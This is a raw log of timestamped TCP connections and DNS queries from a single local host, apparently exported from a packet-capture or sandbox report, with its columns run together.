                                                                          Jan 14, 2025 22:50:30.453845978 CET4434977135.190.80.1192.168.2.4
                                                                          Jan 14, 2025 22:50:30.454174042 CET49771443192.168.2.435.190.80.1
                                                                          Jan 14, 2025 22:50:30.454237938 CET4434977135.190.80.1192.168.2.4
                                                                          Jan 14, 2025 22:50:30.454737902 CET4434977135.190.80.1192.168.2.4
                                                                          Jan 14, 2025 22:50:30.455292940 CET49771443192.168.2.435.190.80.1
                                                                          Jan 14, 2025 22:50:30.455415964 CET4434977135.190.80.1192.168.2.4
                                                                          Jan 14, 2025 22:50:30.455610037 CET49771443192.168.2.435.190.80.1
                                                                          Jan 14, 2025 22:50:30.499370098 CET4434977135.190.80.1192.168.2.4
                                                                          Jan 14, 2025 22:50:30.674365044 CET4434977135.190.80.1192.168.2.4
                                                                          Jan 14, 2025 22:50:30.674670935 CET49771443192.168.2.435.190.80.1
                                                                          Jan 14, 2025 22:50:30.674709082 CET4434977135.190.80.1192.168.2.4
                                                                          Jan 14, 2025 22:50:30.674774885 CET4434977135.190.80.1192.168.2.4
                                                                          Jan 14, 2025 22:50:30.674834967 CET49771443192.168.2.435.190.80.1
                                                                          Jan 14, 2025 22:50:30.674855947 CET49771443192.168.2.435.190.80.1
                                                                          Jan 14, 2025 22:50:30.828545094 CET44349773104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:30.832324028 CET49773443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:30.832340002 CET44349773104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:30.832731009 CET44349773104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:30.833600044 CET49773443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:30.833667994 CET44349773104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:30.834395885 CET49773443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:30.879327059 CET44349773104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:31.037723064 CET44349773104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:31.037801027 CET44349773104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:31.038038969 CET49773443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:31.132045984 CET49773443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:31.132065058 CET44349773104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:31.407948971 CET49774443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:31.407989025 CET44349774104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:31.408751965 CET49774443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:31.409044981 CET49774443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:31.409059048 CET44349774104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:31.866139889 CET44349774104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:31.866461039 CET49774443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:31.866489887 CET44349774104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:31.867255926 CET44349774104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:31.867594957 CET49774443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:31.867681980 CET44349774104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:31.867754936 CET49774443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:31.911349058 CET44349774104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:32.022772074 CET44349774104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:32.022864103 CET44349774104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:32.022912025 CET49774443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:32.022924900 CET44349774104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:32.023212910 CET44349774104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:32.023387909 CET49774443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:32.023576021 CET49774443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:32.023592949 CET44349774104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:32.225929022 CET49776443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:32.226033926 CET44349776104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:32.226119995 CET49776443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:32.226448059 CET49776443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:32.226474047 CET44349776104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:32.274997950 CET4972380192.168.2.4199.232.210.172
                                                                          Jan 14, 2025 22:50:32.280057907 CET8049723199.232.210.172192.168.2.4
                                                                          Jan 14, 2025 22:50:32.280114889 CET4972380192.168.2.4199.232.210.172
                                                                          Jan 14, 2025 22:50:32.707983971 CET44349776104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:32.708313942 CET49776443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:32.708347082 CET44349776104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:32.709114075 CET44349776104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:32.709537983 CET49776443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:32.709624052 CET44349776104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:32.709685087 CET49776443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:32.755347013 CET44349776104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:32.854659081 CET44349776104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:32.854737997 CET44349776104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:32.854818106 CET49776443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:32.855614901 CET49776443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:32.855648994 CET44349776104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:32.905325890 CET49777443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:32.905389071 CET44349777104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:32.905457973 CET49777443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:32.912631035 CET49778443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:32.912676096 CET44349778104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:32.912823915 CET49778443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:32.913970947 CET49778443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:32.913989067 CET44349778104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:32.914313078 CET49777443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:32.914334059 CET44349777104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:33.415887117 CET44349778104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:33.418978930 CET49778443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:33.419007063 CET44349778104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:33.419363976 CET44349778104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:33.423685074 CET49778443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:33.423685074 CET49778443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:33.423705101 CET44349778104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:33.423777103 CET44349778104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:33.424371958 CET44349777104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:33.424468040 CET49778443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:33.424505949 CET44349778104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:33.424645901 CET49778443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:33.424658060 CET44349778104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:33.424815893 CET49777443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:33.424844027 CET44349777104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:33.425344944 CET44349777104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:33.427840948 CET49777443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:33.427926064 CET44349777104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:33.428065062 CET49777443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:33.475331068 CET44349777104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:33.608526945 CET44349777104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:33.608709097 CET44349777104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:33.610564947 CET49777443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:33.653170109 CET49777443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:33.653207064 CET44349777104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:33.717816114 CET44349778104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:33.717859983 CET44349778104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:33.717888117 CET44349778104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:33.717911005 CET44349778104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:33.717937946 CET44349778104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:33.717947006 CET49778443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:33.717978001 CET44349778104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:33.718008995 CET49778443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:33.718012094 CET44349778104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:33.718039989 CET49778443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:33.718048096 CET44349778104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:33.718096018 CET49778443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:33.718101978 CET44349778104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:33.719194889 CET44349778104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:33.719341040 CET49778443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:33.719364882 CET44349778104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:33.722649097 CET44349778104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:33.723125935 CET49778443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:33.723154068 CET44349778104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:33.768596888 CET49778443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:33.808146000 CET44349778104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:33.808180094 CET44349778104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:33.808203936 CET44349778104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:33.808336020 CET49778443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:33.808371067 CET44349778104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:33.808422089 CET44349778104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:33.808453083 CET44349778104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:33.808479071 CET49778443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:33.808490992 CET44349778104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:33.808514118 CET49778443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:33.808563948 CET44349778104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:33.808712006 CET49778443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:33.812378883 CET49778443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:33.812413931 CET44349778104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:33.827428102 CET49779443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:33.827516079 CET44349779104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:33.828047037 CET49779443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:33.828377008 CET49779443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:33.828411102 CET44349779104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:34.301475048 CET44349779104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:34.301891088 CET49779443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:34.301963091 CET44349779104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:34.302695990 CET44349779104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:34.303093910 CET49779443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:34.303191900 CET44349779104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:34.303293943 CET49779443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:34.343355894 CET44349779104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:34.508614063 CET44349779104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:34.508704901 CET44349779104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:34.508877993 CET49779443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:34.509258032 CET49779443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:34.509303093 CET44349779104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:43.368251085 CET49780443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:43.368340015 CET44349780104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:43.368470907 CET49780443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:43.368805885 CET49780443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:43.368869066 CET44349780104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:43.855668068 CET44349780104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:43.856059074 CET49780443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:43.856120110 CET44349780104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:43.858057976 CET44349780104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:43.858573914 CET49780443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:43.858573914 CET49780443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:43.858673096 CET44349780104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:43.858724117 CET49780443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:43.858776093 CET49780443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:43.858844995 CET44349780104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:43.858990908 CET49780443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:43.859092951 CET44349780104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:43.899856091 CET49780443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:44.135088921 CET44349780104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:44.135349989 CET44349780104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:44.135449886 CET49780443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:44.135513067 CET44349780104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:44.135620117 CET44349780104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:44.135752916 CET44349780104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:44.135795116 CET49780443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:44.135863066 CET49780443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:44.136554003 CET49780443192.168.2.4104.18.95.41
                                                                          Jan 14, 2025 22:50:44.136593103 CET44349780104.18.95.41192.168.2.4
                                                                          Jan 14, 2025 22:50:44.142982006 CET49781443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:44.143070936 CET44349781104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:44.143167019 CET49781443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:44.143524885 CET49781443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:44.143563032 CET44349781104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:44.245764017 CET49782443192.168.2.4188.114.97.3
                                                                          Jan 14, 2025 22:50:44.245847940 CET44349782188.114.97.3192.168.2.4
                                                                          Jan 14, 2025 22:50:44.245938063 CET49782443192.168.2.4188.114.97.3
                                                                          Jan 14, 2025 22:50:44.246401072 CET49782443192.168.2.4188.114.97.3
                                                                          Jan 14, 2025 22:50:44.246481895 CET44349782188.114.97.3192.168.2.4
                                                                          Jan 14, 2025 22:50:44.627788067 CET44349781104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:44.628278971 CET49781443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:44.628341913 CET44349781104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:44.629420042 CET44349781104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:44.629863977 CET49781443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:44.629864931 CET49781443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:44.629959106 CET44349781104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:44.630043030 CET44349781104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:44.673192978 CET49781443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:44.729243994 CET44349782188.114.97.3192.168.2.4
                                                                          Jan 14, 2025 22:50:44.729788065 CET49782443192.168.2.4188.114.97.3
                                                                          Jan 14, 2025 22:50:44.729849100 CET44349782188.114.97.3192.168.2.4
                                                                          Jan 14, 2025 22:50:44.730906010 CET44349782188.114.97.3192.168.2.4
                                                                          Jan 14, 2025 22:50:44.730997086 CET49782443192.168.2.4188.114.97.3
                                                                          Jan 14, 2025 22:50:44.731463909 CET49782443192.168.2.4188.114.97.3
                                                                          Jan 14, 2025 22:50:44.731501102 CET49782443192.168.2.4188.114.97.3
                                                                          Jan 14, 2025 22:50:44.731538057 CET49782443192.168.2.4188.114.97.3
                                                                          Jan 14, 2025 22:50:44.731585979 CET44349782188.114.97.3192.168.2.4
                                                                          Jan 14, 2025 22:50:44.731658936 CET49782443192.168.2.4188.114.97.3
                                                                          Jan 14, 2025 22:50:44.731945038 CET49783443192.168.2.4188.114.97.3
                                                                          Jan 14, 2025 22:50:44.731982946 CET44349783188.114.97.3192.168.2.4
                                                                          Jan 14, 2025 22:50:44.732050896 CET49783443192.168.2.4188.114.97.3
                                                                          Jan 14, 2025 22:50:44.732306957 CET49783443192.168.2.4188.114.97.3
                                                                          Jan 14, 2025 22:50:44.732316017 CET44349783188.114.97.3192.168.2.4
                                                                          Jan 14, 2025 22:50:44.748219967 CET44349781104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:44.748646021 CET44349781104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:44.748743057 CET49781443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:44.749171019 CET49781443192.168.2.4104.18.94.41
                                                                          Jan 14, 2025 22:50:44.749209881 CET44349781104.18.94.41192.168.2.4
                                                                          Jan 14, 2025 22:50:45.274704933 CET44349783188.114.97.3192.168.2.4
                                                                          Jan 14, 2025 22:50:45.279829025 CET49783443192.168.2.4188.114.97.3
                                                                          Jan 14, 2025 22:50:45.279845953 CET44349783188.114.97.3192.168.2.4
                                                                          Jan 14, 2025 22:50:45.281421900 CET44349783188.114.97.3192.168.2.4
                                                                          Jan 14, 2025 22:50:45.281529903 CET49783443192.168.2.4188.114.97.3
                                                                          Jan 14, 2025 22:50:45.295629025 CET49783443192.168.2.4188.114.97.3
                                                                          Jan 14, 2025 22:50:45.295818090 CET49783443192.168.2.4188.114.97.3
                                                                          Jan 14, 2025 22:50:45.295816898 CET44349783188.114.97.3192.168.2.4
                                                                          Jan 14, 2025 22:50:45.339338064 CET44349783188.114.97.3192.168.2.4
                                                                          Jan 14, 2025 22:50:45.341730118 CET49783443192.168.2.4188.114.97.3
                                                                          Jan 14, 2025 22:50:45.341759920 CET44349783188.114.97.3192.168.2.4
                                                                          Jan 14, 2025 22:50:45.393163919 CET49783443192.168.2.4188.114.97.3
                                                                          Jan 14, 2025 22:50:45.920583963 CET44349783188.114.97.3192.168.2.4
                                                                          Jan 14, 2025 22:50:45.920854092 CET44349783188.114.97.3192.168.2.4
                                                                          Jan 14, 2025 22:50:45.920916080 CET49783443192.168.2.4188.114.97.3
                                                                          Jan 14, 2025 22:50:45.922543049 CET49783443192.168.2.4188.114.97.3
                                                                          Jan 14, 2025 22:50:45.922563076 CET44349783188.114.97.3192.168.2.4
                                                                          Jan 14, 2025 22:50:46.050369024 CET49786443192.168.2.4188.114.97.3
                                                                          Jan 14, 2025 22:50:46.050410032 CET44349786188.114.97.3192.168.2.4
                                                                          Jan 14, 2025 22:50:46.050488949 CET49786443192.168.2.4188.114.97.3
                                                                          Jan 14, 2025 22:50:46.051457882 CET49786443192.168.2.4188.114.97.3
                                                                          Jan 14, 2025 22:50:46.051490068 CET44349786188.114.97.3192.168.2.4
                                                                          Jan 14, 2025 22:50:46.533838987 CET44349786188.114.97.3192.168.2.4
                                                                          Jan 14, 2025 22:50:46.534240007 CET49786443192.168.2.4188.114.97.3
                                                                          Jan 14, 2025 22:50:46.534262896 CET44349786188.114.97.3192.168.2.4
                                                                          Jan 14, 2025 22:50:46.538163900 CET44349786188.114.97.3192.168.2.4
                                                                          Jan 14, 2025 22:50:46.538264036 CET49786443192.168.2.4188.114.97.3
                                                                          Jan 14, 2025 22:50:46.538743019 CET49786443192.168.2.4188.114.97.3
                                                                          Jan 14, 2025 22:50:46.538913965 CET44349786188.114.97.3192.168.2.4
                                                                          Jan 14, 2025 22:50:46.538944006 CET49786443192.168.2.4188.114.97.3
                                                                          Jan 14, 2025 22:50:46.579369068 CET44349786188.114.97.3192.168.2.4
                                                                          Jan 14, 2025 22:50:46.581341982 CET49786443192.168.2.4188.114.97.3
                                                                          Jan 14, 2025 22:50:46.581371069 CET44349786188.114.97.3192.168.2.4
                                                                          Jan 14, 2025 22:50:46.624630928 CET49786443192.168.2.4188.114.97.3
                                                                          Jan 14, 2025 22:50:47.180222034 CET44349786188.114.97.3192.168.2.4
                                                                          Jan 14, 2025 22:50:47.180476904 CET44349786188.114.97.3192.168.2.4
                                                                          Jan 14, 2025 22:50:47.180643082 CET49786443192.168.2.4188.114.97.3
                                                                          Jan 14, 2025 22:50:47.181289911 CET49786443192.168.2.4188.114.97.3
                                                                          Jan 14, 2025 22:50:47.181304932 CET44349786188.114.97.3192.168.2.4
                                                                          Jan 14, 2025 22:51:06.937455893 CET49741443192.168.2.434.225.212.255
                                                                          Jan 14, 2025 22:51:06.937517881 CET4434974134.225.212.255192.168.2.4
                                                                          Jan 14, 2025 22:51:10.639743090 CET49748443192.168.2.450.6.174.34
                                                                          Jan 14, 2025 22:51:10.639764071 CET4434974850.6.174.34192.168.2.4
                                                                          Jan 14, 2025 22:51:19.907422066 CET49888443192.168.2.4142.250.65.164
                                                                          Jan 14, 2025 22:51:19.907440901 CET44349888142.250.65.164192.168.2.4
                                                                          Jan 14, 2025 22:51:19.907520056 CET49888443192.168.2.4142.250.65.164
                                                                          Jan 14, 2025 22:51:19.907896042 CET49888443192.168.2.4142.250.65.164
                                                                          Jan 14, 2025 22:51:19.907912016 CET44349888142.250.65.164192.168.2.4
                                                                          Jan 14, 2025 22:51:20.387650013 CET44349888142.250.65.164192.168.2.4
                                                                          Jan 14, 2025 22:51:20.388008118 CET49888443192.168.2.4142.250.65.164
                                                                          Jan 14, 2025 22:51:20.388040066 CET44349888142.250.65.164192.168.2.4
                                                                          Jan 14, 2025 22:51:20.388381958 CET44349888142.250.65.164192.168.2.4
                                                                          Jan 14, 2025 22:51:20.388895035 CET49888443192.168.2.4142.250.65.164
                                                                          Jan 14, 2025 22:51:20.388967991 CET44349888142.250.65.164192.168.2.4
                                                                          Jan 14, 2025 22:51:20.437115908 CET49888443192.168.2.4142.250.65.164
                                                                          Jan 14, 2025 22:51:20.920998096 CET4972480192.168.2.4199.232.210.172
                                                                          Jan 14, 2025 22:51:20.926136017 CET8049724199.232.210.172192.168.2.4
                                                                          Jan 14, 2025 22:51:20.926258087 CET4972480192.168.2.4199.232.210.172
                                                                          Jan 14, 2025 22:51:21.975001097 CET49741443192.168.2.434.225.212.255
                                                                          Jan 14, 2025 22:51:21.975090981 CET4434974134.225.212.255192.168.2.4
                                                                          Jan 14, 2025 22:51:21.975138903 CET49741443192.168.2.434.225.212.255
                                                                          Jan 14, 2025 22:51:25.766889095 CET49748443192.168.2.450.6.174.34
                                                                          Jan 14, 2025 22:51:25.767030001 CET4434974850.6.174.34192.168.2.4
                                                                          Jan 14, 2025 22:51:25.767127991 CET49748443192.168.2.450.6.174.34
                                                                          Jan 14, 2025 22:51:30.311474085 CET44349888142.250.65.164192.168.2.4
                                                                          Jan 14, 2025 22:51:30.311553955 CET44349888142.250.65.164192.168.2.4
                                                                          Jan 14, 2025 22:51:30.311650991 CET49888443192.168.2.4142.250.65.164
                                                                          Jan 14, 2025 22:51:30.634598017 CET49888443192.168.2.4142.250.65.164
                                                                          Jan 14, 2025 22:51:30.634614944 CET44349888142.250.65.164192.168.2.4
                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Jan 14, 2025 22:50:15.404561996 CET53651521.1.1.1192.168.2.4
                                                                          Jan 14, 2025 22:50:15.455318928 CET53498641.1.1.1192.168.2.4
                                                                          Jan 14, 2025 22:50:16.668909073 CET53533841.1.1.1192.168.2.4
                                                                          Jan 14, 2025 22:50:19.843971968 CET5645853192.168.2.41.1.1.1
                                                                          Jan 14, 2025 22:50:19.844116926 CET6125453192.168.2.41.1.1.1
                                                                          Jan 14, 2025 22:50:19.850745916 CET53564581.1.1.1192.168.2.4
                                                                          Jan 14, 2025 22:50:19.850900888 CET53612541.1.1.1192.168.2.4
                                                                          Jan 14, 2025 22:50:21.019300938 CET5576753192.168.2.41.1.1.1
                                                                          Jan 14, 2025 22:50:21.019730091 CET6114253192.168.2.41.1.1.1
                                                                          Jan 14, 2025 22:50:21.038330078 CET53557671.1.1.1192.168.2.4
                                                                          Jan 14, 2025 22:50:21.044605017 CET53611421.1.1.1192.168.2.4
                                                                          Jan 14, 2025 22:50:22.067456961 CET6489353192.168.2.41.1.1.1
                                                                          Jan 14, 2025 22:50:22.067650080 CET6284653192.168.2.41.1.1.1
                                                                          Jan 14, 2025 22:50:22.075043917 CET53648931.1.1.1192.168.2.4
                                                                          Jan 14, 2025 22:50:22.075155020 CET53628461.1.1.1192.168.2.4
                                                                          Jan 14, 2025 22:50:23.687633991 CET5573853192.168.2.41.1.1.1
                                                                          Jan 14, 2025 22:50:23.688369036 CET5901353192.168.2.41.1.1.1
                                                                          Jan 14, 2025 22:50:23.900403976 CET53590131.1.1.1192.168.2.4
                                                                          Jan 14, 2025 22:50:24.050293922 CET53557381.1.1.1192.168.2.4
                                                                          Jan 14, 2025 22:50:24.613975048 CET6497253192.168.2.41.1.1.1
                                                                          Jan 14, 2025 22:50:24.614104033 CET6399653192.168.2.41.1.1.1
                                                                          Jan 14, 2025 22:50:24.623203993 CET53639961.1.1.1192.168.2.4
                                                                          Jan 14, 2025 22:50:24.628087044 CET53649721.1.1.1192.168.2.4
                                                                          Jan 14, 2025 22:50:24.735974073 CET6156853192.168.2.41.1.1.1
                                                                          Jan 14, 2025 22:50:24.736231089 CET5616453192.168.2.41.1.1.1
                                                                          Jan 14, 2025 22:50:24.947184086 CET53615681.1.1.1192.168.2.4
                                                                          Jan 14, 2025 22:50:24.991925001 CET53561641.1.1.1192.168.2.4
                                                                          Jan 14, 2025 22:50:26.241797924 CET5649253192.168.2.41.1.1.1
                                                                          Jan 14, 2025 22:50:26.241935968 CET6131053192.168.2.41.1.1.1
                                                                          Jan 14, 2025 22:50:26.242300034 CET5938753192.168.2.41.1.1.1
                                                                          Jan 14, 2025 22:50:26.242422104 CET6244153192.168.2.41.1.1.1
                                                                          Jan 14, 2025 22:50:26.242713928 CET5310453192.168.2.41.1.1.1
                                                                          Jan 14, 2025 22:50:26.242830038 CET5220053192.168.2.41.1.1.1
                                                                          Jan 14, 2025 22:50:26.248650074 CET53564921.1.1.1192.168.2.4
                                                                          Jan 14, 2025 22:50:26.248944998 CET53613101.1.1.1192.168.2.4
                                                                          Jan 14, 2025 22:50:26.249387980 CET53593871.1.1.1192.168.2.4
                                                                          Jan 14, 2025 22:50:26.249635935 CET53624411.1.1.1192.168.2.4
                                                                          Jan 14, 2025 22:50:26.249722958 CET53531041.1.1.1192.168.2.4
                                                                          Jan 14, 2025 22:50:26.251158953 CET53522001.1.1.1192.168.2.4
                                                                          Jan 14, 2025 22:50:27.047396898 CET5102153192.168.2.41.1.1.1
                                                                          Jan 14, 2025 22:50:27.047527075 CET5201353192.168.2.41.1.1.1
